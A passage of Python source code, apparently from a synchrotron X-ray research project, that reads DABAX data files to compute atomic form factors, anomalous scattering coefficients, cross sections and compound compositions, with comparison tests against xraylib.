f0coeff[icentral] for i in range(icentral): F0 += f0coeff[i] * numpy.exp(-1.0 * f0coeff[i + icentral + 1] * ratio ** 2) return F0 # # __* are auxiliary routines, not to be exported # def __f0_interpolate_coefficients(charge, interesting_entries, charge_list, coefficient_list, verbose=True): # # f0 data # nitems = len(interesting_entries) if nitems == 1: print("Warning: cannot interpolate in charge: only one entry available for ", interesting_entries[0]) return coefficient_list[0] charge_list_difference = [] for i in range(nitems): charge_list_difference.append(charge_list[i] - charge) charge_list_difference = numpy.array(charge_list_difference) # convert to numpy array if numpy.abs(charge_list_difference).min() == 0: idx = numpy.abs(charge_list_difference).argmin() if verbose: print("No interpolation needed: returning value for ", interesting_entries[idx]) return coefficient_list[idx] # get the two closest charge values, regardless of the sign sorted_indices = numpy.argsort(numpy.abs(charge_list_difference)) sorted_index_0 = sorted_indices[0] sorted_index_1 = sorted_indices[1] delta_data = charge_list[sorted_index_1] - charge_list[sorted_index_0] delta_charge = charge - charge_list[sorted_index_0] delta = delta_charge / delta_data if verbose: print("Interpolating charge %g = %s + %g (%s - %s)" % (charge, interesting_entries[sorted_index_0], delta, interesting_entries[sorted_index_1], interesting_entries[sorted_index_0])) # interpolate to get the f0 for the wanted charge q = numpy.linspace(0.0, 2.0, 100)
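# Linear interpolation in charge between the two closest tabulated entries:
# f0(q; charge) ~= f0(q; c0) + delta * (f0(q; c1) - f0(q; c0)), with delta = (charge - c0) / (c1 - c0);
# the interpolated curve is evaluated on the q grid above and re-fitted below to recover 9 standard coefficients.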
f0_0 = calculate_f0_from_f0coeff(coefficient_list[sorted_index_0], q) f0_1 = calculate_f0_from_f0coeff(coefficient_list[sorted_index_1], q) f0 = f0_0 + delta * (f0_1 - f0_0) # # fit # try: popt, pcov = curve_fit(__f0func, q, f0, p0=coefficient_list[sorted_index_0], maxfev=20000) if verbose: print("fitted: ", popt) return popt except: if verbose: print("Error: failed to fit coefficients for fractional charge. Returning the ones of ", interesting_entries[sorted_index_0]) return coefficient_list[sorted_index_0] def __f0func(q, a1, a2, a3, a4, a5, a6, a7, a8, a9): return calculate_f0_from_f0coeff([a1, a2, a3, a4, a5, a6, a7, a8, a9], q) ######################### # f1f2 ######################### def f1f2_calc_dabax(descriptor, energy, theta=3.0e-3, F=0, density=None, rough=0.0, verbose=True, filename="f1f2_Windt.dat", dabax_repository=dabax_repository, interpolation_log=False): """ calculate the elastic Photon-Atom anomalous f1 and f2 coefficients as a function of energy. It also gives the refractive index components delta and beta (n=1-delta - i beta), the photoelectric absorption coefficient and the reflectivities (s, p and unpolarized). :param descriptor: string with the element symbol or integer with Z :param energy: array with energies (eV) :param theta: array with grazing angles (rad) :param F: calculation flag: F=0 (default) returns a 2-col array with f1 and f2 F=1 returns f1 F=2 returns f2 F=3 returns delta [n = 1 -delta -i beta] F=4 returns betaf [n = 1 -delta -i beta] F=5 returns Photoelectric linear absorption coefficient F=6 returns Photoelectric mass absorption coefficient F=7 returns Photoelectric Cross Section F=8 returns s-polarized reflectivity F=9 returns p-polarized reflectivity F=10 returns unpolarized reflectivity F=11 returns delta/betaf :param density: the density to be used for some calculations.
If None, it is taken from xraylib :param rough: the roughness RMS in Angstroms for reflectivity calculations :return: a numpy array with results """ energy = numpy.array(energy,dtype=float).reshape(-1) theta = numpy.array(theta,dtype=float).reshape(-1) if isinstance(descriptor,str): Z = atomic_number_dabax(descriptor) symbol = descriptor else: Z = descriptor symbol = atomic_symbols_dabax()[descriptor] # atomic_symbols_dabax() takes no argument: index the returned list by Z if density is None: density = element_density_dabax(symbol, dabax_repository=dabax_repository, verbose=verbose) if verbose: print("f1f2_calc: using density: %f g/cm3" % density) # access spec file file1 = get_dabax_file(filename, dabax_repository=dabax_repository, verbose=verbose) sf = SpecFile(file1) flag_found = False for index in range(len(sf)): s1 = sf[index] name = s1.scan_header_dict["S"] line = " ".join(name.split()) if (line.split(' ')[1]) == descriptor: flag_found = True index_found = index if not flag_found: raise (Exception("Entry name not found: %s" % descriptor)) zadd = sf[index_found].scan_header_dict["UF1ADD"] data = sf[index_found].data L = sf.labels(index_found) photon_energy = data[0, :].copy() if filename in ['f1f2_asf_Kissel.dat','f1f2_Chantler.dat']: photon_energy *= 1e3 if filename == 'f1f2_asf_Kissel.dat': f1 = data[4,:].copy() f2 = numpy.abs(data[1,:].copy()) else: f1 = data[1, :].copy() f2 = data[2, :].copy() if interpolation_log: f1_interpolated = 10 ** numpy.interp(numpy.log10(energy), numpy.log10(photon_energy), numpy.log10(numpy.abs(f1))) f2_interpolated = 10 ** numpy.interp(numpy.log10(energy), numpy.log10(photon_energy), numpy.log10(numpy.abs(f2))) else: f1_interpolated = numpy.interp(energy, photon_energy, f1) f2_interpolated = numpy.interp(energy, photon_energy, f2) if float(zadd) != 0: # adds Z if not included in the data (zadd is read from the header as a string) f1_interpolated += float(zadd) if F == 0: # F=0 (default) returns a 2-col array with f1 and f2 out = numpy.zeros((2,energy.size)) out[0,:] = f1_interpolated out[1,:] = f2_interpolated return out elif F == 1: # F=1 returns f1 return f1_interpolated elif F == 2: # F=2 returns f2 return f2_interpolated # atwt = xraylib.AtomicWeight(Z) atwt = atomic_weights_dabax(symbol, dabax_repository=dabax_repository, verbose=verbose) avogadro = codata.Avogadro toangstroms = codata.h * codata.c / codata.e * 1e10 re = codata.e ** 2 / codata.m_e / codata.c ** 2 / (4 * numpy.pi * codata.epsilon_0) * 1e2 # in cm molecules_per_cc = density * avogadro / atwt wavelength = toangstroms / energy * 1e-8 # in cm k = molecules_per_cc * re * wavelength * wavelength / 2.0 / numpy.pi delta = k * f1_interpolated betaf = k * f2_interpolated mu = 4.0 * numpy.pi * betaf / wavelength if F == 3: # F=3 returns delta [n = 1 -delta -i beta] return delta elif F == 4: # F=4 returns betaf [n = 1 -delta -i beta] return betaf elif F == 5: # F=5 returns Photoelectric linear absorption coefficient return mu elif F == 6: # F=6 returns Photoelectric mass absorption coefficient return mu / density elif F == 7: # F=7 returns Photoelectric Cross Section return mu / molecules_per_cc * 1e24 elif F == 11: # F=11 returns delta/betaf return delta / betaf # # mirror reflectivity # alpha = 2.0 * k * f1_interpolated gamma = 2.0 * k * f2_interpolated # rs,rp,runp = interface_reflectivity(alpha,gamma,theta) if rough != 0: rough *= 1e-8 # to cm debyewaller = numpy.exp( -( 4.0 * numpy.pi * numpy.sin(theta) * rough / wavelength)**2) else: debyewaller = 1.0 if F == 8: # returns s-polarized reflectivity return rs * debyewaller elif F == 9: # returns p-polarized reflectivity return rp * debyewaller elif F == 10: # returns
unpolarized reflectivity return runp * debyewaller raise Exception("Invalid F=%g" % F) ######################### # cross section ######################### def cross_calc_dabax(descriptor, energy, col_titles=None, theta=3.0e-3, partial="TotalCrossSection", casematch=1, density=None, unit=0, verbose=True, filename="CrossSec_EPDL97.dat", dabax_repository=dabax_repository, interpolation_log=False): """ ; CROSS_CALC ; ; calculate the atomic cross sections and attenuation coefficients. ; It uses data from the DABAX database. ; ; ; CALLING SEQUENCE: ; out = cross_calc(input,descriptor[,energy,col_titles]) ; INPUTS: ; input: a dabax input file as accepted by dabax_access(). ; The program also accepts the empty string '' and ; takes the first cross section file in the list. ; descriptor: a string with a description of the material. ; The string is searched in the scan titles #S in order ; to find the appropriate data. ; OPTIONAL INPUTS: ; energy: if undefined, it uses the standard energy grid. ; When energy is defined, this value is used as a grid ; for the results (it interpolates in the case of ; tabulated data). Always in eV. ; OPTIONAL OUTPUTS: ; col_titles: An array of strings with the labels of the data returned ; in "out" ; ; KEYWORDS: ; PARTIAL= Text string that has to be matched with the column titles ; in the DABAX data file. It is used to extract partial cross ; sections. For example PARTIAL='TotalCrossSection' (default value) will ; output the columns having this word in their labels, thus ; the total cross section. Use for example 'Compton', or ; 'Rayleigh' if you want to extract only one of the other partial ; cross sections or absorption coefficients. This keyword is ; case-insensitive unless you set the CASEMATCH keyword. ; CASEMATCH= to be used together with the PARTIAL keyword. ; When this keyword is set to 1, the matching for the text ; in PARTIAL is case sensitive. ; DENSITY= the density value to be used for the calculations. If ; not defined, take the value given by Atomic_Constants(). ; (used only if UNIT=3) ; UNIT= An integer indicating the unit of the output array ; 0 (default): barn/atom (Cross Section calculation) ; 1 : cm^2 (Cross Section calculation) ; 2 : cm^2/g (Mass Attenuation Coefficient) ; 3 : cm^-1 (Linear Attenuation Coefficient) ; VERBOSE= If set (default is verbose=1) prints some info. ; OUTPUT: ; out: an array with the values of the selected return parameter(s). ; ; PROCEDURE: ; Takes the CrossSection values from the DABAX files. It also takes the ; Atomic constants from DABAX, and performs the classical ; operations to calculate the other parameters.
; ; EXAMPLES: """ energy = numpy.array(energy,dtype=float).reshape(-1) if isinstance(descriptor,str): Z = atomic_number_dabax(descriptor) symbol = descriptor else: Z = descriptor symbol =atomic_symbols_dabax()[descriptor] if density is None: density = element_density_dabax(symbol, dabax_repository=dabax_repository, verbose=verbose) if verbose: print("cross_calc: using density: %f g/cm3" % density) # access spec file file1 = get_dabax_file(filename, dabax_repository=dabax_repository, verbose=verbose) sf = SpecFile(file1) flag_found = False for index in range(len(sf)): s1 = sf[index] name = s1.scan_header_dict["S"] line = " ".join(name.split()) if (line.split(' ')[1]) == descriptor: flag_found = True index_found = index break if not flag_found: raise (Exception("Entry name not found: %s" % descriptor)) if partial is None: F = 'TotalCrossSection' else: F = partial data = sf[index_found].data L = sf.labels(index_found) for i,iL in enumerate(L): if "PhotonEnergy" in iL: index_energy = i break fconv = 1.0 if "KEV" in L[index_energy].upper(): fconv = 1e3 elif "MEV" in L[index_energy].upper(): fconv = 1e6 for i, iL in enumerate(L): if F in iL: index_column = i break if verbose: print(">>>>>>>>>>>>>>>>>>> extracting: ", index_energy, index_column, L[index_energy].capitalize(), L[index_column], "fconv: ",fconv) photon_energy = data[index_energy, :].copy() * fconv cross_section = data[index_column, :].copy() if interpolation_log: cross_section_interpolated = 10 ** numpy.interp(numpy.log10(energy), numpy.log10(photon_energy), numpy.log10(numpy.abs(cross_section))) else: cross_section_interpolated = numpy.interp(energy, photon_energy, cross_section) if unit == 0: str_unit = 'barn/atom' elif unit == 1: # cm^2 cross_section_interpolated *= 1e-24 str_unit = 'cm^2' elif unit == 2: # cm^2/g cf = 1e-24 * codata.Avogadro / \ atomic_constants_dabax(descriptor,return_label='AtomicMass',dabax_repository=dabax_repository,verbose=verbose) cross_section_interpolated *= cf str_unit = 'cm^2/g' elif unit == 3: # cm^-1 cf = 1e-24 * codata.Avogadro / \ atomic_constants_dabax(descriptor,return_label='AtomicMass',dabax_repository=dabax_repository,verbose=verbose) * density cross_section_interpolated *= cf str_unit = 'cm^-1' return cross_section_interpolated ###################### # miscellaneous ###################### def atomic_weights_dabax(descriptor, filename="AtomicWeights.dat", dabax_repository=dabax_repository, verbose=True, ): """ ; Returns atomic weights from DABAX. ; ; INPUTS: ; id: an identifier string (i.e. 'Si', '70Ge) ; ; If descriptor is the symbol (e.g., Ge), ; the averaged atomic mass is returned. ; If descriptor contains the isotope (number of nucleons) (e.g., 70Ge), ; the atomic mass for the isotope is returned. 
; ; filename = the DABAX inout file (default AtomicWeights.dat) """ if isinstance(descriptor,str): descriptor = [descriptor] descriptor_is_string = 1 else: # is list descriptor_is_string = 0 # access spec file file1 = get_dabax_file(filename, dabax_repository=dabax_repository, verbose=verbose) sf = SpecFile(file1) out = [] for idescriptor in descriptor: flag_found = False index_found = [] for index in range(len(sf)): s1 = sf[index] name = s1.scan_header_dict["S"] line = " ".join(name.split()) scan_name = line.split(' ')[1] if scan_name[-len(idescriptor):] == idescriptor: flag_found = True index_found.append(index) if not flag_found: raise (Exception("Entry name not found: %s" % idescriptor)) data = sf[index_found[0]].data if idescriptor[0].isdigit(): out.append(data[0,0]) else: out.append(data[2,0]) if descriptor_is_string: return out[0] else: return out def atomic_symbols_dabax(): return [ 'Vacuum','H','He','Li','Be','B','C','N','O','F','Ne', 'Na','Mg','Al','Si','P','S','Cl','Ar','K','Ca', 'Sc','Ti','V','Cr','Mn','Fe','Co','Ni','Cu','Zn', 'Ga','Ge','As','Se','Br','Kr','Rb','Sr','Y','Zr', 'Nb','Mo','Tc','Ru','Rh','Pd','Ag','Cd','In','Sn', 'Sb','Te','I','Xe','Cs','Ba','La','Ce','Pr','Nd', 'Pm','Sm','Eu','Gd','Tb','Dy','Ho','Er','Tm','Yb', 'Lu','Hf','Ta','W','Re','Os','Ir','Pt','Au','Hg', 'Tl','Pb','Bi','Po','At','Rn','Fr','Ra','Ac','Th', 'Pa','U','Np','Pu','Am','Cm','Bk','Cf','Es','Fm', 'Md','No','Lr','Rf','Db','Sg','Bh','Hs','Mt','Ds', 'Rg','Uub','Uut','Uuq','Uup','Uuh','Uus','Uuo'] def atomic_names_dabax(): return [ 'Vacuum', 'Hydrogen', 'Helium', 'Lithium', 'Beryllium', 'Boron', 'Carbon', 'Nitrogen', 'Oxygen', 'Fluorine', 'Neon', 'Sodium', 'Magnesium', 'Aluminum', 'Silicon', 'Phosphorus', 'Sulfur', 'Chlorine', 'Argon', 'Potassium', 'Calcium', 'Scandium', 'Titanium', 'Vanadium', 'Chromium', 'Manganese', 'Iron', 'Cobalt', 'Nickel', 'Copper', 'Zinc', 'Gallium', 'Germanium', 'Arsenic', 'Selenium', 'Bromine', 'Krypton', 'Rubidium', 'Strontium', 'Yttrium', 'Zirconium', 'Niobium', 'Molybdenum', 'Technetium', 'Ruthenium', 'Rhodium', 'Palladium', 'Silver', 'Cadmium', 'Indium', 'Tin', 'Antimony', 'Tellurium', 'Iodine', 'Xenon', 'Cesium', 'Barium', 'Lanthanum', 'Cerium', 'Praseodymium', 'Neodymium', 'Promethium', 'Samarium', 'Europium', 'Gadolinium', 'Terbium', 'Dysprosium', 'Holmium', 'Erbium', 'Thulium', 'Ytterbium', 'Lutetium', 'Hafnium', 'Tantalum', 'Tungsten', 'Rhenium', 'Osmium', 'Iridium', 'Platinum', 'Gold', 'Mercury', 'Thallium', 'Lead', 'Bismuth', 'Polonium', 'Astatine', 'Radon', 'Francium', 'Radium', 'Actinium', 'Thorium', 'Protactinium', 'Uranium', 'Neptunium', 'Plutonium', 'Americium', 'Curium', 'Berkelium', 'Californium', 'Einsteinium', 'Fermium', 'Mendelevium', 'Nobelium', 'Lawrencium', 'Rutherfordium', 'Dubnium', 'Seaborgium', 'Bohrium', 'Hassium', 'Meitnerium', 'Darmstadtium', 'Roentgenium', 'Ununbium', 'Ununtrium', 'Ununquadium', 'Ununpentium', 'Ununhexium', 'Ununseptium', 'Ununoctium'] def atomic_number_dabax(symbol): return atomic_symbols_dabax().index(symbol) def atomic_constants_dabax(descriptor, filename="AtomicConstants.dat", dabax_repository=dabax_repository, verbose=True, return_item=0, return_label=None, ): """ ; Returns atomic constants from DABAX. ; ; CALLING SEQUENCE: ; out = atomic_constants(id,file,return=return) ; INPUTS: ; id: an identifier (or an array of identifiers) to be found in the ; scan title (i.e. 'Si') ; ; KEYWORDS: ; File = the DABAX inout file (default: AtomicConstants.dat) ; return_label and return_item define the variable to be returned. 
; If return_label is not None, it has priority over return_item. ; return_item is the number of the column in the DABAX file; return_label is a text ; identifier (case sensitive) listed below: ; return_label='AtomicRadius' or return_item=0 ; return_label='CovalentRadius' or return_item=1 ; return_label='AtomicMass' or return_item=2 ; return_label='BoilingPoint' or return_item=3 ; return_label='MeltingPoint' or return_item=4 ; return_label='Density' or return_item=5 ; return_label='AtomicVolume' or return_item=6 ; return_label='CoherentScatteringLength' or return_item=7 ; return_label='IncoherentX-section' or return_item=8 ; return_label='[email protected]' or return_item=9 ; return_label='DebyeTemperature' or return_item=10 ; return_label='ThermalConductivity' or return_item=11 ; ; OUTPUT: ; out: the value of the selected parameter ; ; EXAMPLES: ; print(atomic_constants('Si',return='AtomicMass')) ; 28.085500 ; print(atomic_constants(14,return='AtomicMass')) ; 28.085500 ; print(atomic_constants([14,27],return='AtomicMass')) ; 28.085500 58.933200 ; ;- """ if isinstance(descriptor,str): descriptor = [descriptor] descriptor_is_string = 1 else: # is list descriptor_is_string = 0 return_index = -1 if return_label is None: return_index = return_item else: if return_label == 'AtomicRadius' : return_index = 0 if return_label == 'CovalentRadius' : return_index = 1 if return_label == 'AtomicMass' : return_index = 2 if return_label == 'BoilingPoint' : return_index = 3 if return_label == 'MeltingPoint' : return_index = 4 if return_label == 'Density' : return_index = 5 if return_label == 'AtomicVolume' : return_index = 6 if return_label == 'CoherentScatteringLength' : return_index = 7 if return_label == 'IncoherentX-section' : return_index = 8 if return_label == '[email protected]' : return_index = 9 if return_label == 'DebyeTemperature' : return_index = 10 if return_label == 'ThermalConductivity' : return_index = 11 if return_index == -1: raise Exception("Bad item index") # access spec file file1 = get_dabax_file(filename, dabax_repository=dabax_repository, verbose=verbose) sf = SpecFile(file1) out = [] for idescriptor in descriptor: flag_found = False # initialize before scanning the file, so a missing entry is detected for index in range(len(sf)): s1 = sf[index] name = s1.scan_header_dict["S"] scan_name = name.split(' ')[1] if scan_name == idescriptor: flag_found = True index_found = index break if flag_found: out.append((sf[index_found].data)[return_index, 0]) else: raise Exception("Data not found for %s " % idescriptor) if descriptor_is_string: return out[0] else: return out def element_density_dabax(descriptor, filename="AtomicConstants.dat", dabax_repository=dabax_repository, verbose=True,): return atomic_constants_dabax(descriptor, filename=filename, return_label="Density",dabax_repository=dabax_repository, verbose=verbose) def CompoundParser(descriptor, dabax_repository=dabax_repository, verbose=True): zetas, fatomic = parse_formula(formula=descriptor, verbose=verbose) elements = [] atomic_weight = [] massFractions = [] for i,z in enumerate(zetas): symbol = atomic_symbols_dabax()[z] atw = atomic_weights_dabax(symbol, dabax_repository=dabax_repository, verbose=verbose) elements.append(z) atomic_weight.append(atw) massFractions.append(fatomic[i]*atw) mweight = 0.0 for i in range(len(fatomic)): mweight += atomic_weight[i] * fatomic[i] for i in range(len(massFractions)): massFractions[i] /= mweight new_dict = { "nElements": len(elements), "nAtomsAll": float(numpy.array(fatomic).sum()), "Elements":zetas, "massFractions": massFractions, "nAtoms":fatomic, "molarMass": mweight, } return new_dict def 
parse_formula(formula, verbose=True): import re if formula.count('(') == 0: pass elif formula.count('(') == 1: if verbose: print("Found parentheses") match = re.search(r'\([\x00-\xFF]*\)(\d\.?\d?)', formula) subformula = match.group(0) if verbose: print(" >>>>>>> subformula", subformula) match = re.search(r'\(([^\)]*)\)', subformula) subformula_inside_parentheses = match.group(0)[1:-1] if verbose: print(" >>>>>>> subformula inside parentheses", subformula_inside_parentheses) match = re.search(r'\)\d\.?\d?', subformula) times = float(match.group(0)[1:]) if verbose: print(" >>>>>>> times", times) zetas, fatomic = parse_formula(subformula_inside_parentheses, verbose=verbose) if verbose: print(" >>>> zetas, fatomic:",zetas, fatomic) string = '' for i,element in enumerate(zetas): string += atomic_symbols_dabax()[element] + "%g" % (fatomic[i] * times) if verbose: print(" expanded: ", string, "replaced", formula.replace(subformula, string)) return parse_formula(formula.replace(subformula, string), verbose=verbose) else: raise NotImplementedError("wrong formula %s: multiple parentheses not implemented" % formula ) tmp = re.findall(r'([A-Z][a-z]*)(\d*\.?\d?)', formula) fatomic = [] zetas = [] for element,str_number in tmp: if str_number == '': number = 1 else: number = float(str_number) fatomic.append(float(number)) zetas.append(atomic_number_dabax(element)) return zetas, fatomic if __name__ == "__main__": import xraylib # for comparisons from srxraylib.plot.gol import plot # redefine the default server at ESRF because default server name is different outside and inside ESRF import socket if socket.getfqdn().find("esrf") >= 0: # dabax_repository = "http://ftp.esrf.fr/pub/scisoft/DabaxFiles/" dabax_repository = "/scisoft/DABAX/data" else: dabax_repository = "http://ftp.esrf.eu/pub/scisoft/DabaxFiles/" # # crystal tests # if True: print(get_dabax_file("Crystals.dat", dabax_repository=dabax_repository, verbose=0)) print(get_f0_coeffs_from_dabax_file("Y3+", filename="f0_InterTables.dat", dabax_repository=dabax_repository)) print(Crystal_GetCrystalsList(dabax_repository=dabax_repository)) yb = Crystal_GetCrystal('YB66', filename='Crystals.dat', dabax_repository=dabax_repository) si = Crystal_GetCrystal("Si", dabax_repository=dabax_repository) print("Si 111 d-spacing: ", Crystal_dSpacing(si,1,1,1)) print("Si 111 bragg angle at 10 keV [deg]: ", 180 / numpy.pi * Bragg_angle(si,10, 1,1,1)) # # crystal vs xraylib tests # if True: print(Crystal_GetCrystal(entry_name='YB66', filename='Crystals.dat', dabax_repository=dabax_repository)) # compare with xraylib xdabax = Crystal_GetCrystal(entry_name='Si', filename='Crystals.dat', dabax_repository=dabax_repository) xxraylib = xraylib.Crystal_GetCrystal('Si') for key in xxraylib.keys(): tmp = xxraylib[key] if isinstance(tmp, list): for i, element in enumerate(tmp): print(key, i, xdabax[key][i], xxraylib[key][i]) else: print(key, xdabax[key], xxraylib[key]) # # f0 # if True: # # test f0 data for B3+ # q = numpy.array([0,0.05,0.1,0.15,0.2,0.25,0.3,0.35,0.4,0.5,0.6,0.7,0.8,0.9,1,1.1,1.2,1.3,1.4,1.5,1.6,1.7,1.8,1.9]) f0_B3plus = numpy.array([2,1.995,1.979,1.954,1.919,1.875,1.824,1.766,1.703,1.566,1.42,1.274,1.132,0.999,0.877,0.767,0.669,0.582,0.507,0.441,0.384,0.335,0.293,0.256]) # # plot # from srxraylib.plot.gol import plot coeff_Bdot = numpy.array([]) plot(q, f0_B3plus, q, calculate_f0_from_f0coeff(f0_with_fractional_charge(5, 3.0, dabax_repository=dabax_repository), q), q, calculate_f0_from_f0coeff(f0_with_fractional_charge(5, 2.8, 
dabax_repository=dabax_repository), q), xtitle=r"q (sin $\theta$ / $\lambda$)", ytitle="f0 [electron units]", legend=["B3plus original", "B3plus from f0_with_fractional_charge(5,+3)", "B3plus from f0_with_fractional_charge(5,+2.8)"], title="") # # f0 another test # if True: # # test f0 data for B3+ # q = numpy.array( [0, 0.05, 0.1, 0.15, 0.2, 0.25, 0.3, 0.35, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1, 1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9]) f0_B3plus = numpy.array( [2, 1.995, 1.979, 1.954, 1.919, 1.875, 1.824, 1.766, 1.703, 1.566, 1.42, 1.274, 1.132, 0.999, 0.877, 0.767, 0.669, 0.582, 0.507, 0.441, 0.384, 0.335, 0.293, 0.256]) # # plot # from srxraylib.plot.gol import plot coeff_Bdot = numpy.array([]) plot(q, f0_B3plus, q, calculate_f0_from_f0coeff(f0_with_fractional_charge(5, 3.0, dabax_repository=dabax_repository), q), q, calculate_f0_from_f0coeff(f0_with_fractional_charge(5, 2.8, dabax_repository=dabax_repository), q), xtitle=r"q (sin $\theta$ / $\lambda$)", ytitle="f0 [electron units]", legend=["B3plus original", "B3plus from f0_with_fractional_charge(5,+3)", "B3plus from f0_with_fractional_charge(5,+2.8)"], title="", show=1) # # f1f2 tests # if True: from orangecontrib.xoppy.util.xoppy_xraylib_util import f1f2_calc files_f1f2 = [ "f1f2_asf_Kissel.dat", "f1f2_BrennanCowan.dat", "f1f2_Chantler.dat", "f1f2_CromerLiberman.dat", "f1f2_EPDL97.dat", "f1f2_Henke.dat", "f1f2_Sasaki.dat", "f1f2_Windt.dat", ] out = [] energy = numpy.linspace(1000,28000,500) F=1 # for F in [1]: # range(12) tmpX = f1f2_calc("Si", energy, F=F, theta=2e-3, verbose=0) out.append(tmpX) for file_f1f2 in files_f1f2: tmp = f1f2_calc_dabax("Si", energy, F=F, theta=2e-3, verbose=0, filename=file_f1f2, dabax_repository=dabax_repository ) out.append(tmp) legend = ['xraylib'] for file_f1f2 in files_f1f2: legend.append(file_f1f2) plot(energy, out[0], energy, out[1], energy, out[2], energy, out[3], energy, out[4], energy, out[5], energy, out[6], energy, out[7], energy, out[8], legend=legend, xlog=1,ylog=1) for F in range(12): a_xraylib = f1f2_calc("Si", 10000, F=F, theta=2e-3, verbose=0) a_dabax = f1f2_calc_dabax("Si", 10000, F=F, theta=2e-3, verbose=0, filename=file_f1f2, dabax_repository=dabax_repository) diff = (numpy.array(a_dabax) - numpy.array(a_xraylib)) / numpy.array(a_xraylib) print("dabax: ", file_f1f2, a_dabax) print("xraylib: ", a_xraylib) print("diff: ", numpy.abs( diff.sum())) assert (numpy.abs( diff.sum()) < 0.11 ) if True: # # misc # print("Ge, Si: ", atomic_weights_dabax(["Ge","Si"],dabax_repository=dabax_repository)) print("70Ge: ", atomic_weights_dabax("70Ge",dabax_repository=dabax_repository)) print(atomic_symbols_dabax()[14], atomic_names_dabax()[14]) print("Si atomic mass", atomic_constants_dabax("Si", return_item=2, dabax_repository=dabax_repository, verbose=0)) print("Si,Ge atomic mass", atomic_constants_dabax(["Si","Ge"], return_item=2, dabax_repository=dabax_repository, verbose=0)) print("Si,Co atomic mass", atomic_constants_dabax(["Si", "Co"], return_label='AtomicMass', dabax_repository=dabax_repository, verbose=0)) print("Z=27", atomic_symbols_dabax()[27]) print("Ge Z=%d" % atomic_number_dabax("Ge")) print("Density Si: ", xraylib.ElementDensity(14), element_density_dabax("Si", dabax_repository=dabax_repository,verbose=0)) # TODO: does not work for double parenthesis "Ga2(F(KI))3" for descriptor in ["H2O","Eu2H2.1O1.3","PO4", "Ca5(PO4)3.1F"]: print("\n",descriptor, dabax_repository) print("DABAX: ", CompoundParser(descriptor, dabax_repository=dabax_repository, verbose=0)) print("XRAYLIB: ", 
xraylib.CompoundParser(descriptor)) if True: # # cross sections # from orangecontrib.xoppy.util.xoppy_xraylib_util import cross_calc unit = 1 filenames = ["CrossSec_EPDL97.dat", "CrossSec_BrennanCowan.dat", "CrossSec_McMaster.dat", "CrossSec_NISTxaamdi.dat", "CrossSec_PE_Scofield.dat", "CrossSec_StormIsrael.dat", "CrossSec_XCOM.dat", ] energy = numpy.linspace(10000, 20000, 200) out = [] tmpX = cross_calc("Si", energy, calculate=0, unit=unit) out.append(tmpX) for filename in filenames: tmp = cross_calc_dabax("Si", energy, partial='TotalCrossSection', unit=unit, filename=filename, dabax_repository=dabax_repository, verbose=0) out.append(tmp) legend = ['xraylib'] for file in filenames: legend.append(file) plot(energy, out[0], energy, out[1], energy, out[2], energy, out[3], energy, out[4], energy, out[5], energy, out[6], energy, out[7], legend=legend, xlog=1,ylog=1) ``` #### File: yb66/discussion/dabax_util.py ```python import os import numpy from urllib.request import urlretrieve from silx.io.specfile import SpecFile from orangecontrib.xoppy.util.xoppy_xraylib_util import bragg_metrictensor from f0coeffs_fit import crystal_get_f0_coeffs from symbol_to_from_atomic_number import symbol_to_from_atomic_number """ <NAME>, <EMAIL>, <NAME> <EMAIL> """ def get_dabax_file(filename, url="http://ftp.esrf.eu/pub/scisoft/DabaxFiles/"): try: if os.path.exists(filename): print("File exists: %s " % filename) else: filepath, http_msg = urlretrieve(url + filename, filename=filename, reporthook=None, data=None) print("File %s downloaded from %s" % (filepath, url + filename)) return True except: return False def get_f0_coeffs_from_dabax_file(entry_name="Y3+", filename="f0_InterTables.dat"): error_flag = get_dabax_file(filename) if error_flag == False: raise FileNotFoundError(filename) sf = SpecFile(filename) flag_found = False for index in range(len(sf)): s1 = sf[index] name = s1.scan_header_dict["S"] if name.split(' ')[1] == entry_name: flag_found = True index_found = index if flag_found: return numpy.array(sf[index_found].data)[:,0] else: raise(Exception("Entry name not found: %s" % entry_name)) def get_f0_from_f0coeff(f0coeff, ratio): icentral = len(f0coeff) // 2 F0 = f0coeff[icentral] for i in range(icentral): F0 += f0coeff[i] * numpy.exp(-1.0 * f0coeff[i + icentral + 1] * ratio ** 2) return F0 def crystal_parser(filename='Crystals.dat', entry_name='YB66'): """ parse a complex crystal structure file into a dictionary (like xraylib) return a dictionary containing the crystal information """ error_flag = get_dabax_file(filename) sf = SpecFile(filename) flag_found = False for index in range(len(sf)): s1 = sf[index] name = s1.scan_header_dict["S"] if name.split(' ')[1] == entry_name: flag_found = True index_found = index if not flag_found: raise (Exception("Entry name not found: %s" % entry_name)) cryst = {'name':entry_name} #returned dictionary like that one created by xraylib.Crystal_GetCrystal(descriptor) cell_parameters = sf[index_found].scan_header_dict["UCELL"] cell_parameters = ' '.join(cell_parameters.split()) # remove multiple blanks a = cell_parameters.split(' ') cryst['a'] = float(a[0]) cryst['b'] = float(a[1]) cryst['c'] = float(a[2]) cryst['alpha'] = float(a[3]) cryst['beta'] = float(a[4]) cryst['gamma'] = float(a[5]) alpha = float(a[3]) * numpy.pi / 180 beta = float(a[4]) * numpy.pi / 180 gamma = float(a[5]) * numpy.pi / 180 # I do not know if this is valid for all crystal systems...
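# (For reference: the general triclinic cell volume is
# V = a*b*c*sqrt(1 - cos^2(alpha) - cos^2(beta) - cos^2(gamma) + 2*cos(alpha)*cos(beta)*cos(gamma));
# bragg_metrictensor(..., RETURN_VOLUME=1) below computes the volume from the metric tensor,
# so it holds for all crystal systems. Note that the commented-out expression uses
# a[1]*a[2]*a[3], where a[0]*a[1]*a[2], i.e. a*b*c, was presumably intended.)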
